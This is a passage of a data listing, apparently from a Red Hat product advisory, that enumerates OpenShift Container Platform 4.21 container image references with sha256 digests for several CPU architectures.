"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:07c82fce5e470c7ee9c3c1fdc6c953c962ed119411c88bf5fd4f0a08e3a0b9b7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:83a7a3bb3080d3386eb7fa7debe976a551c272a1d70f31d7cc05a437f175f0c2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:aa7cbd8edc2a40bf3b8572f48f1174b46134ecd22c1a961984c7989398a5a0ab_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:e9c7cedabf9b749ae2faf9427a229757c3c1c5871054667444168030eab28aab_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f3470dd96c2c29ceef92ea0ab5adfcecead95eba0f1caa1fad96f3fdf50f57c6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f96eef8cedb41be61dcaf4850e5550582f0d84a306775dfc0c7f9958f18ba7ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:5d09872519b5a3247dd7a3d5bd250485dcd750307c3853e2cdf43519889178ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:63523bed0624b4db33be2b7a5e8dd3c5b532c70a3ad3083504aebc29e85d3a29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:20a2d23d2de3e31036ca89f2d629b6d06df5504b8f46c88a6cb5e081aa6afdc8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:c47e8b82686adae62dd7c66b82309407d82166f510384a404343e515b829001d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:cb2a3088916b8d8f9489260792f677a59864ab01e9c62361198549b1f822a80b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:f18c64ad1dd81b9ae774488b6994b6d17f6aeb968e644652150ea08b3f6b4dbb_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:a0f3e8ad332f4e63e1aa2742eef069487fd49f4c335269da7b619f7630907a45_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:d2dfd7ae650a6eaced303a1119f94cc1a7097d7609e2a80d84aef5e6380d902e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:2d622f4dbba3bd91a020a734dc0d8c632e58d56373cae44c4af79cbc81a37cd4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:8a69bf9f6b9f8e3dc685d704d31b4a4eded70bdf33ed57dfa8768c016faae46a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:9d0697a33547102399cbeb0a60f9ebfb2a2eb4d3c0e15efba177a96dd27e60f8_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:c87863f0cd97c592cc54c1fc2ab9fbe1468d6302763eaa7a6530af059382d797_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:2a8fa4bac908dd97a3be2e302eb6ac1431dc3537beed23caf257d2c3f47bbc74_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:98994385568f84af533c448d17ae372eac4a26eda4a6b62277253155e20bae54_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:0b92ec408159a4f0e5308cf58ad89cc4ca40880ce097e0807a19c12f235ca5fc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:291f1185778ccc92e28d235ab30ddb1f85fb94199d3889dcf600f35e60093d4c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:7a6604dbc334622a976776e7725e4eba7ba4e8872a87f49bbb1c6f334b2f6c95_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:b2b43c379dcfac66d038927315c419c7d512ce1dd29b34c7dc74a00f7b63a0d1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5628a2419c5721f274edcfe794c881d1fb2af158788c45fbcb7a33f6db9948d4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:56b71e09ae6780121a1c0a52867782196cd43c3e716093fca3ceb3fde5b66d1f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5c1172fb42f1b34b67f5e2044bb190849bacaf5eebabdafdc82d0a7f1c1a7d84_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:d617cb1a419f9d43b5bfff5bfdc670a9c8d0462b47c474d4d1ccea726c108101_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:03f260cff8faf00b22557be8d6be6f81489e9265b339c3a3053bfe5b1de020e7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:5cc05e80c48b83737bcd3f4622e0eedaed7baf06024c23753ca77ffc11b9b306_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:9df1f434a7eae17b9e335feb35d3cad8d15887bc55d2f20c8720ac17633e88f5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:e3d92a87de3c10beda3aba219657f079cafcd03c6ee0b87bd0826d3f51e85997_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:20f0c4f5e4678aac81a44e5f164627b29bbebfc3e17b5010ea7104309a234476_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:2125f95e12d8c30d743da09f3f8451e70a7b0cd8299b173f748a4affd1aab940_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:42c14c3b43aa86ab4a94d86b737ce7eea32703c70db0a5f0e9ac13f9a8f385cf_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:fe5f92c1647f1b8a6d7c25f4b11bbf310b7f9c2003d9fd8d9659108114330054_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:24b98a6e4bc5f0edd37fcb1a0aefa809cc95d50a22da8059c3a8a6811d1596ad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:27d6d5aea37e0e535d3db14419f53b898251476c64e9f41f00d2afc308d22293_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:4d0e4a3e50a3bac437c4960c0a079d2148fb8dab6655a761b1d10a1c653633b1_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6c4e49d812a40fa01b187bce2d2f6060df10a06ddb248469465c53c6e8c01415_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:2bcdce58a9dec8306ea7ec58ed588c6def1d0e2891d06b91661cb04a1411242f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:493c047ca44c43a15896612c8df60ed0e65017435c57e5cad41a9ee23b275e71_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:6427135ca011b5cc6539000ab9d3bd9e2d68c7703d1e50423d01a88d8ed90fc6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:b33e8c16ab733fb79f0f690e0288f40e9bf8e03a7477b35120dcd29475fb9310_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:53e8fcbba44d9c73eb93da4c101562634f44646eafb544d4c711431b409ff825_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:73223d1dcb0b0d07decc32ba99eb6875597c1fac474c6c9368f75ef12e342e4d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:809e1636777dcaaa79d79c5edb76ff243ca743fa119a4988b3ac8b9222d3ba3f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:981dfbf55ceaaaca41ec375ff1a95db0409f443ed70dc84859545af82668280c_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:197df56874e5b85f148dec36d644749d5e1c39e262737beab0fa2f866749876f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:9705094f22d110094312ff158c6fe6576de45d5119f3f236608831fb286e953b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:b710c08d2b2cee582d55d2bb5829b0d35375e04c88a1d2e9b7cef725212d0cba_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:d0c4572792d7337fe9ce11cdd9000ebc8d86b345bc7e8dcb6b2718ad3439c6fe_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:1746abd22482e0307a612a4832326e681ecb67358723df137b076bf13dbe638d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:8fecae242c9d6ef4ea859bbb68219912ce75735c53b350ddca2ef230c1dc17af_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:da2bd0d6afdcf81c37f95aba0ea52d4ee063710a49bf399938ba8dca10f079ef_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:edbe1d6b65c67df5cc6822fc0138938ca4266c792d8dedd8121dc88648d72a16_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:3f4231f318f661de982c522ecc26a6e35a1728e12b68d84ae32641fb41ac0ce0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:6a19d1ab1ae1c3a8cd270e3b90ba8631d8342688f9111e7eb05d6d5e7b9c7e0e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:97c43c0d0949b12333e19892c20232f1db9e9a4400022b13ce628e20398b1b83_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:eaac0e5ca6347913022442f309e559ad953f5f92ba6c6ebd545e276b229d75fb_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:217f0c7a5cae2b5d399977054083acbe87ad4005f7471eb76d6290cd1ec98217_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:92f8b02f0ea036b3630d44820aefc84c9853f218fc679b9750c088cc4f07c1af_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a7515b3ad53a0ac77da9d16a60b50e43385784930e96d5545094c7019607f95f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:c19b3af8649a3add22233266845553734d949453ad4095426e79ab373528bdd1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1432f3b24284b174dd6c69fc6170eb2952ddd29d8eeb976911c5f0ddb3e2e21b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:15dfa677bfa8066eaf05de566e02ed341900558be9d384b9face40216889730e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1ca76b4d5aa455cef111e3ea31cc16eafe26a6c3ed6a9f4111e66e2088a5b3de_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:c6ac4b0406087730cb3689049a5322f057cb7f6e2caf6f39dee68baa115cc85b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:148d7bf1e8d2f5a7b853e257ed30aec67b9d684316756b8593d1f31a2ab0d593_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:47a0e0bcec249f6ed2003797f66ce095128fb8115326a7d0ef41d528e2445213_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:66b6fd4e62537ca3252f72fad3807c10bb3d32dcc535e84f7c80d7cca1f12cf3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9463ca409614b7d8fe425b0792a1faa34cf43d3397dbf00ddf05b13997cd8ba6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:16d3fcd0bbbd77893146ff2ff66f2b56ef1e23f0a478e506e52b8c3481f45c4b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:70ece97f4bde794353c6e71255874b17d3af77b1a4d2283460b7188a495c782c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:959c043c98f9c69d091fa1ff171360b2cf40e829becdc967f5b314e66ccf9fde_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d4b99966cb1cdf067d73eab6074f42203f65c0a10c78ef3b16f7deae78e21b94_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9cb8a702b78977cc3a6e5418210d15a0d431fa56c217cfd8b5f69653d6acb89d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a5f93ba58c76c1d26d44bbe14a70d4cfb07e7edd9401bee47da3ce2abc435bc1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:ba11e45b58a6c4940f40f11c0d47129571103de5883d4ccf22b6ba5b9ccdb9b4_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:fc95a3a095e63ec33e95a638dae9f529583c054cbdc3dacf1b90d1e10f35bea3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:299f374419ceec56c49dc130fc4052bb7140be28f23b6f5b414607bc8ad4a805_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:414f0b86c4940ad7a5ca443bf04ff8293f93804d8b69688382e177afa1459394_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b96362fcb7b09af38eed2bd77d8720fe128a4c677d3a5d46dbe3b09412fd1fd5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:e207c502258c60ca9fbe42ecaf9ab005dd7ba3d9b76566b6a92756fc73b6968e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:1a22a625e67c26e4db67b97a3e08fe63a1ed931e419b732fb186567ab5c2edd7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:42396c0e20ce9c8afbfb8c87b80e1b48b0695118a583b1e107f07bae9ead7614_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:46afc0e9d2c34fbcb000ed2ac59c393aa4160944bf083b4b4ef7f09a73c77023_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:903ed233bcf6493cca231fe024bda6085f9dda1052783e5f8daa8d5c35b6652f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:b3747aca163af2713256a975222f6dac10692a5b99ef948bb8e4471532e4e484_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cb27bf3938c353f8ed8138c5c650be7e72ee2e9d6b14e998eaa2e39db18fe3ed_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:fef2fda5b7fde7cae7b32d63507fe61ffcc74632e7c5170146f9afa5d827a359_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:ff132632ffb2f87746e79787cac21fba12a9862a707885dbe9ccf95f2b388941_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:15399cbb6b6adc9ec25f1174ad8e04f5c5f5bf0b02d4ee7023b4f38e810aca03_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:51b7944a69371c67883a6decf075013feb4cea80258fc0927176fa824c98cf2f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b24d5a179400093a2a61b87f3c0dbd8d1f1f91e8fcb288e18f87ef5fe8bd6a4c_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:e8aa91667479746a74f25506fcdaa4b639b947d73a77af49f2b945f93e2fdb46_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:1782aa4b09b78512885d81c529588737d738cf29def3ff2542e74fd02d256cf2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:66e02bf9c48cac8edb441d20fc8bcf3f57af58d13b9bc65e7337592e466592c3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:c9f28ea22ec8ebfecd5af2d0369ed023b6f9d4e3413e3ad6048aeebb124ede5f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:ccd9f2be0df364b640b1e2b8b470bb9a536222383734258e4917bcc0adddec38_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:03747941ed41fbe46a4eea27ccedfde73d5cb56d7da3e6bd58c0591800014e3c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:725ba6da6b823755b419f3fa21abd83b3b8bfbda87a0ebe95cd1154afdd5edca_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:b6d1aa1c4d291f0e581185ac425a900961f2a01b73481f004607e0918af0aaad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:bfc8fbbd5e342e4e801d576913b0a6a9c41150c0a091eb43d0886a18f3a22f17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:63f0b1ba5c3947e640911e31b9032bce1b7e3cffd16574158a67a9d8bfbb52d1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9a0291c1d482cc75b5da3b61ea6cb240bae63c7f7bae7ca5d6ef9cdd30233432_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:d8fcb99e70b38b22fe131df90326e000e0cda91f206468ad06d4e8ebecc323a0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e44e5b2f803f9c0e0003b5832fbb90a80c9e35a36ff524cfbe04b00d18dd9aad_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:0628f21ae749dad21df82d4375448da03b3556d8cfa3411a91d7693ee050635f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:33b125caf8101d10e87c75d960666659dc64ecb8c9cc15c39049f82b174a2b03_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3be19f58c31be0655db45e701bd9852a07ae1fda287301fa8218f2ef56c2ee55_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:99153879eb97320f2d86b6af296540250f7e234f847a01bc3d0ab50e509918a9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:0e4945c40c683253f210a354ab1b52cfaae5fb3c844b47f391c1cdaa9fe170a0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:16ebabf0329c1fa4104b3f3d244c3b3e54ff6b7f747b092b66e3ef2b4d79216f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:200cc383245287f696fd5c0c6bf63b2bfb96c4e27e8fa46f7938b49af2e40f94_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:5cf69f239d585f936caca1ea97ec5870e6fdfcfee2fdf83984d40e371fa31180_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:31946984af1316d14937792eb39335d8effa5774fc5c28200d770d48117ce492_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:b39be2a08e43aef9897cc7a3d411d9ad6b8037cfed852e916e57d0346ac7e675_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c82aa35aff9a2feda3598f7a1d84a7b7b78736af05dbeccdac3a5d2600d6cbb5_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:fda1392b4de1ec066e6e816968c6a5af8fe4f33a9dd81216dcac8f34c5824010_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:2a75be0f5104de3c9b587e92dd8e266d7d54c278b8c15321b377ca6ad7636cf0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:33929a52af39ae582e1c19c4b3598b0b1d83669aed27faa42fdad73798d7b4bc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:70f1339b43a7a2ffa55e8128782dbf02308e74e7f3b71e93e498a8fc841bae68_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:ac058f6d264bc7ce4ae8ffdc63c30eff96ccb2ea8c3b896a761d4acfc41c685b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:67a5c7868876aa2532948aabd3169bad5b43d278fb72bbc3c7996166605a61a5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:7df58145a95adeb913b9cbca82da8ae856a10b3de5ed25e170fd7af9c80afdd7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:841b26747f8ecaf1056d4737bd1c3f3646d6879ed8a01f28093325e4945c2a2b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:b26b53b427eedb66b64ee766ac8d8915a2e9b4c4d370684c8215fe44a5fe078a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:0c6fbdff8409ec28cb25730648b32d08787a25e422273635ffcfc12df4adcef9_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:2fe70ff939d25ac7ef7809fe566015398423d236276a342dd48df66e690a775d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:84672d5c16e192f5b5919577cbef7098cc4d19be1af37d2a40dce1a162e7dce7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:b0ab000dbe5818bd25853a4917cf7eb8e4d56c228837747f42361fa3ba3e321e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:176d9b8a630e5614f993712266130175fa393b7fa4706a9e0d4e965343864b37_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:477d28c93d7405520951ab1c64f172b66ab4834462e21e8d8f7d1892adde954a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:63a534489c093862945a6215eca0dcae4f7e738414d8840a7962d4604d6dcdb3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:e8a14458a2580a5d8e9719e38fcfad7dcaea488533866d3c784d171383278985_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:0d9579b0b3b9cd657ae69826fefc91d37a609663940aa7d78f403dcb67db7649_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:46eddf2c3239c92218286368ced60b42cea6f789a09ab9981f0e6fbd216cb1f6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:6f5d819b8b433e84c4bb7c41a6a31f1265be15ccbb13a0605d0dc16d718904de_ppc64le",
